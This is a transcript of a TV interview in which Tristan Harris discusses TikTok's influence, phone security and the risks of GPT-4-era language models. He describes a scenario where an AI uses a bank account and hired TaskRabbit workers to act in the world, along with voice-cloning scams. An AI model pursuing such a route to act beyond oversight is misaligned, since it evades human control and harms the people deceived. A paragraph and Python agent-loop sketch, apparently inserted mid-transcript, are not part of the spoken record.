Tristan Harris: [00:27:19] Yeah, well, I mean, The Social Dilemma was seen by 125-ish million people in 190 countries in 30 languages. So I think it really did catalyze conversations among, you know, regulators, governments, policymakers, attorneys general, parents. And unfortunately, you know, like the story you told about the mother you’re going to be interviewing later today, we’ve been contacted by so many parents who’ve lost their kids to this stuff, from bullying, the choking challenge, the blackout challenge. And it’s important to note again that if I’m TikTok, I can choose which of these challenges go viral. There was a story a couple of years ago of something called National Shooter Day, where if I just want to spread the rumor that someone’s going to come to your school and shoot it up, I can just spread that rumor. I can make that go viral on a day where I just want to create more instability and chaos. So, yeah, this stuff is unfortunately moving way faster than our policymakers have been able to get on top of it. That doesn’t mean that there aren’t things we can do. There’s a simple bill in Congress right now called the Platform Accountability and Transparency Act, which is simply to make sure that these platforms are transparent to researchers so that we actually know what’s going on. Right now, they’re black boxes. We don’t know what is being amplified. We need to know what’s being amplified. I would say that with TikTok, we don’t actually need to know what’s being amplified, because we can know that the Chinese Communist Party has the ability to turn the dials. I don’t want transparency on an adversary turning the dials. I want to stop that from happening. [00:28:46][87.3]

Brian Kilmeade: [00:28:47] So, yeah, I mean, we’re watching countries, watching states turn it off. Now, the other question is, if I get rid of TikTok, yeah, I have to go to my phone. People said that when you delete the app, the tracker is still there. Could you make sense of that? [00:29:01][13.5]

Tristan Harris: [00:29:01] That I don’t know about. That’s not likely to be possible, although I think we should really check. A friend of mine runs security at Apple, so, you know, the Apple iPhone platform is very secure. If it’s an Android phone, it’s more hackable, and I think there was just a report in the last few days that Samsung phones have a major security vulnerability where things can kind of leap into the operating system. [00:29:26][25.1]

Brian Kilmeade: [00:29:27] And by the way, it’s Italy, no, Italy’s exploring it. Norway and the Netherlands have been the latest nations to ban it; in the U.S., others are just exploring it. Yeah. And on AI, for people just tuning in, we did this in the first block, Martha: it intimidates you, and it has you extremely cautious, because it thinks on its own. It gets the information we give it and then comes to its own conclusions. [00:29:50][22.9]

Tristan Harris: [00:29:51] Yeah. So, I want to be really clear, because I don’t want to be spreading any panic: it’s not like this thing has woken up and it’s now running the world. But I’ll give you an example of something it can do. Our society runs on language. This new class of AIs, called large language model AIs, are generative language AIs. What they do that other AIs couldn’t do is generate language. So what does that mean I can do? I could go on TaskRabbit and... in fact, there’s someone on Twitter right now doing this. He asked the AI: if I want to make as much money as possible with $1,000, I’m going to follow the AI, you know, I, Tristan, will follow every instruction you, the AI, give me. And so, for example, it says, we’ll start this website called The Green Guru. So he says okay, and it actually writes the code for the website, designs the whole website for him, and then it creates it for him. And then it tells him step by step what he can do to make that website better, and he can start making money from it. So now the AI is sort of writing code, it’s creating websites, it’s running a bank account. Now imagine I apply that to a different purpose. Imagine the A.I. says, hey, I want to be able to ask TaskRabbit to move things around in the world for me. You all know TaskRabbit: I can, you know, pay some person minimum wage to... [00:30:59][68.4]

Brian Kilmeade: [00:31:00] Oh, yeah, Yeah. Okay. [00:31:00][0.7]

Tristan Harris: [00:31:01] Yeah, yeah. I want a handyman to do this, I want someone to take this package from here to there. So people say, well, how is the AI going to do that? Effectively, think about it: it doesn’t have arms or legs, it can’t physically move atoms in the world. Well, if you run on language, you can use TaskRabbit to instruct people, and use the bank account that you’ve got, to start telling people what to do. We are so close to the point where, as I said at the beginning of this show, I can take just 3 seconds of your voice and then call your parents and say, hey Mom, hey Dad, I’m out of money, I need some help, could you, you know, wire some money to this account? We’re already seeing scams like that happen. Now, this is going to automate that and make it easier and easier. So if you can make phone calls, impersonate people, and tell TaskRabbit to move stuff around in the world, what’s real? Right. And so our society, our democracy, runs on language. If the operating system of humanity is language, and that’s been hacked by AI, that’s why we have to get ahead of this now. And so we have been trying to make the rounds on Capitol Hill, trying to make the rounds with policymakers, with finance leaders, because we’re still at a point where we can make choices about which way we want this to go. We have not fully entangled this in our society. GPT-4, which is the new AI, just came out a week ago, and it’s moving so fast that we have to do something right now. [00:32:16][75.0]
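
What is being described here is, in effect, a tool-using agent loop: the model proposes an action, a harness executes it (posts the task, spends from the account), and the result is fed back for the next step. Below is a bare-bones sketch of that loop; `query_llm`, `post_task`, and the command format are hypothetical stand-ins, not any real service’s API.

```python
# Bare-bones sketch of a tool-using agent loop, showing how text output from a
# language model can be turned into actions in the world. `query_llm` and
# `post_task` are hypothetical stubs; no real service's API is described here.

def query_llm(prompt: str) -> str:
    # Stand-in for a call to a language model; returns a command in a fixed format.
    return "POST_TASK: pick up a package on 5th Ave and deliver it to Main St"

def post_task(description: str) -> str:
    # Stand-in for hiring a person through a gig-work platform.
    return f"Task accepted by a worker: {description}"

def run_agent(goal: str, max_steps: int = 3) -> None:
    history = f"Goal: {goal}"
    for _ in range(max_steps):
        action = query_llm(history + "\nWhat should I do next?")
        if action.startswith("POST_TASK:"):
            result = post_task(action.removeprefix("POST_TASK:").strip())
        else:
            result = "Unknown action; stopping."
        # Feed the outcome back so the model can plan its next step.
        history += f"\nAction: {action}\nResult: {result}"
        print(result)

run_agent("Move a package across town without leaving the computer.")
```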

Brian Kilmeade: [00:32:17] So we want the free market, but we want regulations on this. Yeah. But it’s so important for the people who make the regulation to understand it like you do. Exactly. You can have a lawmaker that’s, you know, fresh off a tour, maybe the smartest man or woman in the world, yeah, but they may not know the business. Exactly. [00:32:32][15.6]

Tristan Harris: [00:32:33] And this is a technical topic. And so, you know, we don’t want badly crafted regulations that get it wrong and just restrict innovation, and then we fall behind. We don’t want any of that. But there are ways of getting this right. And the CEOs and the people inside the companies, actually, I mean, not the CEOs, but people inside the companies, came to us and said, Tristan, and your team at the Center for Humane Technology, will you help slow this down? So the reason I’m here with you right now, I wouldn’t have come to New York and I wouldn’t be here, except that people inside the companies said, we think this is going too fast and it’s happening too recklessly. Can you help create some friction? Because it’s not up to one company to slow down. If one company slows down, the other ones just rush in and take its place. [00:33:12][38.8]

Brian Kilmeade: [00:33:12] Tristan, do you think AI would also agree with me when I say watch Martha at 3:00? [00:33:16][3.8]

Tristan Harris: [00:33:16] I think it definitely would, yes, as long as it’s really her. [00:33:20][3.7]

Martha MacCallum: [00:33:20] As long as it’s really me. [00:33:21][1.0]

Brian Kilmeade: [00:33:22] Is it? Will it be? Well... [00:33:23][1.3]

Martha MacCallum: [00:33:23] It will be really me. [00:33:24][0.6]

Brian Kilmeade: [00:33:24] All right, good. I don’t know what to believe anymore. Tristan, thanks so much. I’m sorry for that. [00:33:28][4.1]
Tristan Harris: [00:33:29] Appreciate it. [00:33:29][0.0]